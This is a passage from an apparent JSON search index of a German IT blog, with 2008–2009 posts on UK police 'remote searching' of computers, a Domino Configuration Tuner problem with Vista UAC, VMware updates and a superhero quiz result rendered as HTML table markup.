umgesetzt wird, ein Bürgerrecht mit Füßen getreten. Im Gegensatz zum “Bundestrojaner” bzw. dem neuen BKA-Gesetz fällt hier der Richtervorbehalt, der auch in Deutschland in letzter Minute eingebracht wurde:\nA remote search can be granted if a senior officer says he “believes” that it is “proportionate” and necessary to prevent or detect serious crime — defined as any offence attracting a jail sentence of more than three years.\nZitat aus: Times Online Hier wird nicht mal mehr unter dem Deckmantel der Terrorabwehr gehandelt, auch mittelschwere Verbrechen sollen hier der Auslöser für den Einbruch die Remote-Suche in einen Computer sein. Wie kann man sich da eigentlich sicher sein, ob einem nicht “Beweise” untergeschoben werden? Der Eindringling nutzt Sicherheitslücken und führt Programme bzw. Suchen mit dem aktuell angemeldeten Benutzernamen oder als Administrator aus.\nIch will niemand was unterstellen, aber in Deutschland wurde z.B. ein Angeklagter freigesprochen, weil ein Sachverständiger bestätigte, daß nach der Konfiszierung des Rechners Dateien verändert bzw. erstellt und gelöscht wurden. Das geht dann aber nicht mehr, wenn direkt zugriffen werden darf!\nSiehe: Nachrichten Heute: Der Bundestrojaner und die unterschobene Straftat Die Informationen können dann auch von anderen “Ordnungshütern” aus EU-Ländern wie Frankreich oder Deutschland angefordert bzw. beauftragt werden.\nvia Chris Linfoot http://feeds.feedburner.com/ r/ChrisLinfoot/3/507018693/CWLT-7N5CBP[Big Brother is Hacking You]\n","excerpt":"\u003cp\u003eIch dachte eigentlich, daß die Briten nicht mehr viel tun können, um\neine allumfassende Überwachung auf die Beine zu stellen. Aber die\nneueste Idee finde ich sehr bedenklich.\u003c/p\u003e\n\u003cp\u003eOhne richterliche Anordnung soll es Polizei und Geheimdienst erlaubt\nsein, in Rechner einzudringen. Dies wird unter dem verniedlichendem\nBegriff “Remote Searching” auch von einem EU Council gedeckt.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[…] The hacking is known as “remote searching”. It allows police or MI5\nofficers who may be hundreds of miles away to examine covertly the hard\ndrive of someone’s PC at his home, office or hotel room. […]\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cblockquote\u003e\n\u003cp\u003eZitat aus:\n\u003ca href=\"http://www.timesonline.co.uk/tol/news/politics/article5439604.ece\" target=\"_blank\"\u003eTimes\nOnline \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003eHier wird wieder unter dem Deckmantel, daß eine EU-Richtlinie umgesetzt\nwird, ein Bürgerrecht mit Füßen getreten. Im Gegensatz zum\n“Bundestrojaner” bzw. dem neuen BKA-Gesetz fällt hier der\nRichtervorbehalt, der auch in Deutschland in letzter Minute eingebracht\nwurde:\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-01-10-britische-polizei-sollen-prophylaktisch-hacken-durfen/","title":"Britische Polizei soll private und geschäftliche Computer hacken dürfen"},{"body":"Es gibt ein Problem beim Einrichten von DCT unter Vista mit aktiviertem UAC. Man sollte bei der Erstkonfiguration das UAC (falls nicht sowieso deaktivert) besser ausschalten.\nOn XP or a Vista machine with UAC turned off this is no problem, the files are deployed and you are prompted to restart your Notes client but with UAC turned on it runs into a bit of an issue, the files to be deployed to the Notes executable directory don’t get deployed and because it’s the notes client trying to put the file onto the hard drive the usual UAC prompt does not pop up. Even if the file deployment fails you will still be asked to restart your notes client and you wont know there is anything wrong till you start DCT again and your asked to restart the notes client yet again.\nvia Dec’s Dom Blog ","excerpt":"\u003cp\u003eEs gibt ein Problem beim Einrichten von DCT unter Vista mit aktiviertem\nUAC. Man sollte bei der Erstkonfiguration das UAC (falls nicht sowieso\ndeaktivert) besser ausschalten.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eOn XP or a Vista machine with UAC turned off this is no problem, the\nfiles are deployed and you are prompted to restart your Notes client but\nwith UAC turned on it runs into a bit of an issue, the files to be\ndeployed to the Notes executable directory don’t get deployed and\nbecause it’s the notes client trying to put the file onto the hard drive\nthe usual UAC prompt does not pop up. Even if the file deployment fails\nyou will still be asked to restart your notes client and you wont know\nthere is anything wrong till you start DCT again and your asked to\nrestart the notes client yet again.\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-01-10-domino-configuration-tuner-and-vistas-uac-dont-mix/","title":"Domino Configuration Tuner and Vista’s UAC Don’t Mix"},{"body":"Ich weiß nicht, ob mich das beruhigen oder beunruhigen sollte?\n[…] die wachsende Zahl an Informationen in modernen, atomgetriebenen U-Booten zu verarbeiten und die Waffensysteme zu kontrollieren. […]\nHeise News ","excerpt":"\u003cp\u003eIch weiß nicht, ob mich das beruhigen oder beunruhigen sollte?\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[…] die wachsende Zahl an Informationen in modernen, atomgetriebenen\nU-Booten zu verarbeiten und die Waffensysteme zu kontrollieren. […]\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e\u003ca href=\"http://www.heise.de/newsticker/Windows-fuer-britische-Atom-U-Boote--/meldung/120633\" target=\"_blank\"\u003eHeise\nNews \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-12-18-windows-fur-britische-atom-u-boote/","title":"Windows für britische Atom-U-Boote"},{"body":"Seinen Blog findet man unter folgender URL: http://blog.nashcom.de/ . Ich bin gespannt auf die Texte. Ich fand seine Artikel im “Groupware Magazin” immer sehr unterhaltsam.\nvia Bob Balaban’s Blog “In Theory” ","excerpt":"\u003cp\u003eSeinen Blog findet man unter folgender URL: \u003ca href=\"http://blog.nashcom.de/\" target=\"_blank\"\u003ehttp://blog.nashcom.de/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. Ich\nbin gespannt auf die Texte. Ich fand seine Artikel im “Groupware\nMagazin” immer sehr unterhaltsam.\u003c/p\u003e\n\u003cp\u003evia \u003ca href=\"http://www.bobzblog.com/tuxedoguy.nsf/feed.rss\" target=\"_blank\"\u003eBob Balaban’s Blog\n“In Theory” \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-12-15-daniel-nashed-bloggt-jetzt-auch/","title":"Daniel Nashed bloggt jetzt auch"},{"body":"Vmware Server 2 und Vmware Workstation stehen bei www.vmware.com zum Download bereit.\nDiese Seite hab ich grad dazu entdeckt: VMFAQ . Eventuell ist ja was interessantes dabei.\n","excerpt":"\u003cp\u003eVmware Server 2 und Vmware Workstation stehen bei\n\u003ca href=\"http://www.vmware.com\" target=\"_blank\"\u003ewww.vmware.com \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n zum Download bereit.\u003c/p\u003e\n\u003cp\u003eDiese Seite hab ich grad dazu entdeckt: \u003ca href=\"http://vmfaq.com/\" target=\"_blank\"\u003eVMFAQ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\nEventuell ist ja was interessantes dabei.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-09-24-vmware-updates/","title":"Vmware Updates"},{"body":"Your results:\nYou are Spider-Man\n\u0026lt;td\u0026gt; \u0026lt;table\u0026gt; \u0026lt;tr\u0026gt; \u0026lt;td\u0026gt; Spider-Man \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; \u0026lt;hr ALIGN=LEFT NOSHADE SIZE=4 WIDTH=85\u0026gt; \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; 85% \u0026lt;/td\u0026gt; \u0026lt;/tr\u0026gt; \u0026lt;tr\u0026gt; \u0026lt;td\u0026gt; Superman \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; \u0026lt;hr ALIGN=LEFT NOSHADE SIZE=4 WIDTH=70\u0026gt; \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; 70% \u0026lt;/td\u0026gt; \u0026lt;/tr\u0026gt; \u0026lt;tr\u0026gt; \u0026lt;td\u0026gt; Hulk \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; \u0026lt;hr ALIGN=LEFT NOSHADE SIZE=4 WIDTH=65\u0026gt; \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; 65% \u0026lt;/td\u0026gt; \u0026lt;/tr\u0026gt; \u0026lt;tr\u0026gt; \u0026lt;td\u0026gt; Robin \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; \u0026lt;hr ALIGN=LEFT NOSHADE SIZE=4 WIDTH=60\u0026gt; \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; 60% \u0026lt;/td\u0026gt; \u0026lt;/tr\u0026gt; \u0026lt;tr\u0026gt; \u0026lt;td\u0026gt; Green Lantern \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; \u0026lt;hr ALIGN=LEFT NOSHADE SIZE=4 WIDTH=55\u0026gt; \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; 55% \u0026lt;/td\u0026gt; \u0026lt;/tr\u0026gt; \u0026lt;tr\u0026gt; \u0026lt;td\u0026gt; Batman \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; \u0026lt;hr ALIGN=LEFT NOSHADE SIZE=4 WIDTH=50\u0026gt; \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; 50% \u0026lt;/td\u0026gt; \u0026lt;/tr\u0026gt; \u0026lt;tr\u0026gt; \u0026lt;td\u0026gt; Supergirl \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; \u0026lt;hr ALIGN=LEFT NOSHADE SIZE=4 WIDTH=45\u0026gt; \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; 45% \u0026lt;/td\u0026gt; \u0026lt;/tr\u0026gt; \u0026lt;tr\u0026gt; \u0026lt;td\u0026gt; The Flash \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; \u0026lt;hr ALIGN=LEFT NOSHADE SIZE=4 WIDTH=45\u0026gt; \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; 45% \u0026lt;/td\u0026gt; \u0026lt;/tr\u0026gt; \u0026lt;tr\u0026gt; \u0026lt;td\u0026gt; Iron Man \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; \u0026lt;hr ALIGN=LEFT NOSHADE SIZE=4 WIDTH=45\u0026gt; \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; 45% \u0026lt;/td\u0026gt; \u0026lt;/tr\u0026gt; \u0026lt;tr\u0026gt; \u0026lt;td\u0026gt; Wonder Woman \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; \u0026lt;hr ALIGN=LEFT NOSHADE SIZE=4 WIDTH=35\u0026gt; \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; 35% \u0026lt;/td\u0026gt; \u0026lt;/tr\u0026gt; \u0026lt;tr\u0026gt; \u0026lt;td\u0026gt; Catwoman \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; \u0026lt;hr ALIGN=LEFT NOSHADE SIZE=4 WIDTH=25\u0026gt; \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; 25% \u0026lt;/td\u0026gt; \u0026lt;/tr\u0026gt; \u0026lt;/table\u0026gt; \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; You are intelligent, witty, \u0026lt;br /\u0026gt;a bit geeky and have great\u0026lt;br /\u0026gt; power and responsibility.\u0026lt;br /\u0026gt; \u0026lt;img SRC=\u0026#34;http://www.thesuperheroquiz.com/pics/spidy.gif\u0026#34; /\u0026gt; \u0026lt;/td\u0026gt; Click here to take the “Which Superhero am I?” quiz… Via Eknori ","excerpt":"\u003cp\u003eYour results:\u003cbr\u003e\n\u003cstrong\u003eYou are Spider-Man\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;table\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e Spider-Man\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;hr \u003cspan style=\"color:#268bd2\"\u003eALIGN\u003c/span\u003e=LEFT NOSHADE \u003cspan style=\"color:#268bd2\"\u003eSIZE\u003c/span\u003e=\u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e4\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eWIDTH\u003c/span\u003e=85\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e 85%\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e Superman\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;hr \u003cspan style=\"color:#268bd2\"\u003eALIGN\u003c/span\u003e=LEFT NOSHADE \u003cspan style=\"color:#268bd2\"\u003eSIZE\u003c/span\u003e=\u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e4\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eWIDTH\u003c/span\u003e=70\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e 70%\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e Hulk\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;hr \u003cspan style=\"color:#268bd2\"\u003eALIGN\u003c/span\u003e=LEFT NOSHADE \u003cspan style=\"color:#268bd2\"\u003eSIZE\u003c/span\u003e=\u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e4\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eWIDTH\u003c/span\u003e=65\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e 65%\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e Robin\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;hr \u003cspan style=\"color:#268bd2\"\u003eALIGN\u003c/span\u003e=LEFT NOSHADE \u003cspan style=\"color:#268bd2\"\u003eSIZE\u003c/span\u003e=\u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e4\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eWIDTH\u003c/span\u003e=60\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e 60%\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e Green Lantern\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;hr \u003cspan style=\"color:#268bd2\"\u003eALIGN\u003c/span\u003e=LEFT NOSHADE \u003cspan style=\"color:#268bd2\"\u003eSIZE\u003c/span\u003e=\u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e4\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eWIDTH\u003c/span\u003e=55\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e 55%\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e Batman\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;hr \u003cspan style=\"color:#268bd2\"\u003eALIGN\u003c/span\u003e=LEFT NOSHADE \u003cspan style=\"color:#268bd2\"\u003eSIZE\u003c/span\u003e=\u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e4\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eWIDTH\u003c/span\u003e=50\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e 50%\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e Supergirl\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;hr \u003cspan style=\"color:#268bd2\"\u003eALIGN\u003c/span\u003e=LEFT NOSHADE \u003cspan style=\"color:#268bd2\"\u003eSIZE\u003c/span\u003e=\u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e4\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eWIDTH\u003c/span\u003e=45\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e 45%\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e The Flash\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;hr \u003cspan style=\"color:#268bd2\"\u003eALIGN\u003c/span\u003e=LEFT NOSHADE \u003cspan style=\"color:#268bd2\"\u003eSIZE\u003c/span\u003e=\u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e4\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eWIDTH\u003c/span\u003e=45\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e 45%\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e Iron Man\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan 